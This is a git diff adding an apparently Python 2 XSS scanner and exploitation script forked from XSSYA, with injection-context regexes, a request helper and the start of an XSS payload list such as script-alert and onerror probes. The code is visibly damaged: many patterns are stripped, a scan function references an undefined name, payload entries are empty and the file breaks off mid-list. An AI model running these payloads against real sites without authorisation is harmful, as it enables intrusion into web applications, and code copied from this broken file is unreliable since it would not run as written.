diff --git a/xssight.py b/xssight.py new file mode 100644 index 0000000..824466c --- /dev/null +++ b/xssight.py @@ -0,0 +1,285 @@ +#!/usr/bin/env python +# -*- coding: cp1252 -*- +# A XSS Scanner and Exploitation Script by D3V teamultimate.in +# Forked from XSSYA by yehia-mamdouh + +from __future__ import absolute_import +from __future__ import print_function +import urllib2 +from urllib2 import Request, build_opener, HTTPCookieProcessor, HTTPHandler +import urllib +from urllib import FancyURLopener +import six.moves.http_cookiejar +import socket +import time +import ssl +import re +import six.moves.http_cookiejar, optparse, random, string, urlparse +import sys +import six.moves.http_client +import colorama +import cookielib +from functools import partial +import custom +from colorama import Fore, Back, Style +from colorama import init +from six.moves import input +colorama.init() + +GET, POST = "GET", "POST" + +retval, usable = False, False +SMALLER_CHAR_POOL = ('<', '>') # characters used for XSS tampering of parameter values (smaller set - for avoiding possible SQLi errors) +LARGER_CHAR_POOL = ('\'', '"', '>', '<', ';') # characters used for XSS tampering of parameter values (larger set) +GET, POST = "GET", "POST" # enumerator-like values used for marking current phase +PREFIX_SUFFIX_LENGTH = 5 # length of random prefix/suffix used in XSS tampering +COOKIE, UA, REFERER = "Cookie", "User-Agent", "Referer" # optional HTTP header names +TIMEOUT = 30 # connection timeout in seconds +DOM_FILTER_REGEX = r"(?s)|\bescape\([^)]+\)|\([^)]+==[^(]+\)|\"[^\"]+\"|'[^']+'" # filtering regex used before DOM XSS search + +REGULAR_PATTERNS = ( # each (regular pattern) item consists of (r"context regex", (prerequitarget unfiltered characters), "info text", r"content removal regex") + (r"\A[^<>]*%(chars)s[^<>]*\Z", ('<', '>'), "\".xss.\", pure text response, %(filtering)s filtering", None), + (r"", ('<', '>'), "\"\", inside the comment, %(filtering)s filtering", None), + (r"(?s)]*>[^<]*?'[^<']*%(chars)s|%(chars)s[^<']*'[^<]*", ('\'', ';'), "\"\", enclosed by ', ('"', ';'), "'', enclosed by ", (';',), "\"\", enclosed by |"), + (r"<[^>]*'[^>']*%(chars)s[^>']*'[^>]*>", ('\'',), "\"<.'.xss.'.>\", inside the tag, inside single-quotes, %(filtering)s filtering", r"(?s)|"), + (r'<[^>]*"[^>"]*%(chars)s[^>"]*"[^>]*>', ('"',), "'<.\".xss.\".>', inside the tag, inside double-quotes, %(filtering)s filtering", r"(?s)|"), + (r"<[^>]*%(chars)s[^>]*>", (), "\"<.xss.>\", inside the tag, outside of quotes, %(filtering)s filtering", r"(?s)|"), +) + +_headers = {} # used for storing dictionary with optional header values + +def _retrieve_content(url, data=None): + try: + req = urllib2.Request("".join(url[i].replace(' ', "%20") if i > url.find('?') else url[i] for i in range(len(url))), data, _headers) + retval = urllib2.urlopen(req, timeout=TIMEOUT).read() + except Exception as ex: + retval = ex.read() if hasattr(ex, "read") else getattr(ex, "msg", str()) + return retval or "" + +def _contains(content, chars): + content = re.sub(r"\\[%s]" % re.escape("".join(chars)), "", content) if chars else content + return all(char in content for char in chars) + +def scan_page(url, data=None): + retval, usable = False, False + url, data = re.sub(r"=(&|\Z)", "=1\g<1>", url) if url else url, re.sub(r"=(&|\Z)", "=1\g<1>", data) if data else data + original = re.sub(DOM_FILTER_REGEX, "", _retrieve_content(url, data)) + dom = max(re.search(_, original) for _ in DOM_PATTERNS) + +###Cross Site Scripting Payloads### +xss_attack = ["%22%3Cscript%3Ealert%28%27dev%27%29%3C%2Fscript%3E" + "", + "1", + "", + "'';!--\"=&{()}", + "", + "clickit", + "", + "%3cvideo+src%3dx+onerror%3dprompt(1)%3b%3e", + "", + "